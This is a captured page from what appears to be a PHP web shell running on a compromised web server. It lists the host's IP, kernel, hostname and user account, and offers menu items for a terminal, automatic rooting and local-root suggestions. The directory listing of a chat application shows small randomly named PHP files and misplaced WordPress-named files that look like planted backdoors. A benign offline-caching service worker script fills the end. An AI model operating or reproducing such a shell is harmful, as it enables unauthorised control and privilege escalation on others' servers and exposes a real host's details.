Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
chat.app /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2026-02-22 15:26
admin
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
api
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
assets
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
cgi-bin
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
chat
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
image
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
includes
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
5CIklYH0.php
445
B
-rw-r--r--
2026-02-23 13:08
G0cQmLsV.php
445
B
-rw-r--r--
2026-02-22 23:14
chat.zip
27.93
MB
-rw-r--r--
2026-02-22 17:31
dashboard.php
36.16
KB
-rw-r--r--
2026-02-23 09:09
database.sql
2.81
KB
-rw-r--r--
2026-02-22 22:29
error_log
2.61
KB
-rw-r--r--
2026-02-23 10:51
index.php
25.53
KB
-rw-r--r--
2026-02-23 10:52
install.php
5.88
KB
-rw-r--r--
2026-02-22 17:43
login.php
5.69
KB
-rw-r--r--
2026-02-22 18:40
logout.php
328
B
-rw-r--r--
2026-02-21 21:39
manifest.json
536
B
-rw-r--r--
2026-02-22 19:03
my_stories.php
11.66
KB
-rw-r--r--
2026-02-21 23:17
signup.php
6.39
KB
-rw-r--r--
2026-02-22 11:41
sw.js
2.21
KB
-rw-r--r--
2026-02-22 20:10
txets.php
4.37
KB
-rw-r--r--
2026-02-24 02:50
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
// SW v12 - OFFLINE FRIENDLY ARCHITECTURE const CACHE_NAME = 'chatapp-offline-v12'; const ASSETS_TO_CACHE = [ 'assets/css/style.css', 'assets/js/main.js', 'https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css', 'https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css' ]; self.addEventListener('install', (event) => { self.skipWaiting(); event.waitUntil( caches.open(CACHE_NAME).then((cache) => cache.addAll(ASSETS_TO_CACHE)) ); }); self.addEventListener('activate', (event) => { event.waitUntil( caches.keys().then((names) => { return Promise.all(names.map(name => { if (name !== CACHE_NAME) return caches.delete(name); })); }).then(() => self.clients.claim()) ); }); self.addEventListener('fetch', (event) => { const url = new URL(event.request.url); // 1. API CACHING STRATEGY (Stale-While-Revalidate) // This ensures friends list shows instantly even if offline/slow if (url.pathname.includes('/api/get_friends.php')) { event.respondWith( caches.open('api-cache').then((cache) => { return cache.match(event.request).then((cachedResponse) => { const fetchedResponse = fetch(event.request).then((networkResponse) => { cache.put(event.request, networkResponse.clone()); return networkResponse; }).catch(() => { // If network fails (really offline), return cached data return cachedResponse; }); return cachedResponse || fetchedResponse; }); }) ); return; } // 2. BYPASS CACHE FOR OTHER APIs/PHP if (url.pathname.includes('/api/') || url.pathname.endsWith('.php')) { event.respondWith(fetch(event.request).catch(() => caches.match(event.request))); return; } // 3. STATIC ASSETS: Cache First event.respondWith( caches.match(event.request).then((response) => { return response || fetch(event.request); }) ); });